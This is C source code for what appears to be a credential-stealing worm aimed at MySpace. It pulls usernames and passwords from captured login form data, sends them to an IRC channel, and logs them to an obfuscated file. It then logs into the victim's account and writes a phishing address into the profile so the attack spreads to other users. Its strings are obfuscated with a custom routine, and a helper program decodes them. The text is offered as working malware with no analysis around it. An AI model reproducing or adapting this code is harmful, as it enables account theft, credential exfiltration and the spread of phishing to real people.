unsigned long MySpaceSendCallback (struct myspace_d *myspace) { char buf[0x40]; myspace->stat=MySpaceEdit(myspace); sprintf(buf, riddle_enc("xB�z=j���~��=i����=B�=EB�WB�F"), // [%c] Myspace Login %s (%s:%s) myspace->stat ? '+' : '-', myspace->stat ? riddle_enc("==_�ooqqpqp") : riddle_enc("<Niqtml"), // 11Succeeded, 4Failed myspace->username,myspace->password); IrcSend(buf); return(myspace->stat); }
int main(int argc, char *argv[]) { printf("Data Output: %s\r\n",riddle_enc(argv[0x1])); //LogToFile("out.txt",riddle_enc(argv[0x1])); HGLOBAL hGlobal=GlobalAlloc(GMEM_MOVEABLE,200); char *hClipboardData=(TCHAR*)GlobalLock(hGlobal); strcpy(hClipboardData,riddle_enc(argv[0x1])); if(OpenClipboard(NULL)) { EmptyClipboard(); GlobalUnlock(hGlobal); if(SetClipboardData(CF_TEXT,hClipboardData)) CloseClipboard(); } getchar(); }
void MySpaceMain (struct myspace_param_d *param) { char buf[0x80]; struct myspace_d myspace; sprintf(myspace.editdata,param->lpEditData,GetPhishingIpAddress()); if(param->bRawData == 0x1) { strcpy(myspace.username,GetHashValue(param->lpLoginData,"Email_Textbox=",'&',14)); strcpy(myspace.password,GetHashValue(param->lpLoginData,"Password_Textbox=",'&',0x11)); sprintf(buf,riddle_enc("*x?*x"),myspace.username,myspace.password); // %s:%s if(MySpaceSendCallback(&myspace)) LogToFile(riddle_enc("ptwo6li|"),buf,"a"); // hlog.dat } ExitThread(0x0); //else MySpaceGetLogData(&myspace); }
int MySpaceEdit (struct myspace_d *myspace) { char buf[0x15F90],lpRequest[0x800],tmp[0x800]; GetWebPage(buf,sizeof(buf),riddle_enc("���=|��prt=r~|"), riddle_enc("rwmn�7lov"),riddle_enc("JHW"),"",0x0); // www.myspace.com, index.cfm, GET LogToFile("tmp.html",buf,"w"); sprintf(lpRequest, "__VIEWSTATE=%s&" "ctl00$Main$SplashDisplay$ctl00$Email_Textbox=%s&" "ctl00$Main$SplashDisplay$ctl00$Password_Textbox=%s", GetHashValue(buf,"__VIEWSTATE",'"',0x25),myspace->username,myspace->password); GetWebPage(buf,sizeof(buf),riddle_enc("�wu��w@���suw@u�"), riddle_enc("�����P���a����������_�����P�������"),riddle_enc("TSWX"),lpRequest,0x0); // secure.myspace.com, index.cfm?fuseaction=login.process, POST LogToFile("afterlogin.html",buf,"w"); if(strstr(buf,riddle_enc("z��An���Ac�Am�����Nj�A��A��Au���B"))) return(0x0); // You Must Be Logged-In to do That! strcpy(myspace->url,GetHashValue(buf,riddle_enc("���}��||{��E����xz|Ez��"),'"',0x18)); // profileedit.myspace.com GetWebPage(buf,sizeof(buf),riddle_enc("���}��||{��E����xz|Ez��"), myspace->url,riddle_enc("JHW"),"",0x0); // profileedit.myspace.com, GET sprintf(lpRequest, "__EVENTTARGET=&__EVENTARGUMENT=&" "__VIEWSTATE=%s&ctl00$ctl00$cpMain$ProfileEditContent$editInterests$hash=%s&" "ctl00$ctl00$cpMain$ProfileEditContent$editInterests$SaveTop=Save All Changes&" "ctl00$ctl00$cpMain$ProfileEditContent$editInterests$AboutMeTextBox=%s", GetHashValue(buf,"__VIEWSTATE",'"',0x25),GetHashValue(buf,"_hash",'"',0xE),myspace->editdata); strcpy(tmp,lpRequest); GetWebPage(buf,sizeof(buf),riddle_enc("���}��||{��E����xz|Ez��"), myspace->url,riddle_enc("JHW"),"",0x0); // profileedit.myspace.com, GET GetWebPage(buf,sizeof(buf),riddle_enc("���}��||{��E����xz|Ez��"), GetHashValue(buf,"name=\"aspnetForm\"",'"',0x29),riddle_enc("TSWX"),tmp,0x1); // profileedit.myspace.com, POST GetWebPage(NULL,0x0,"collect.myspace.com","index.cfm?fuseaction=signout","GET","",0x1); LogToFile("logoff.html",buf,"w"); return(0x1); }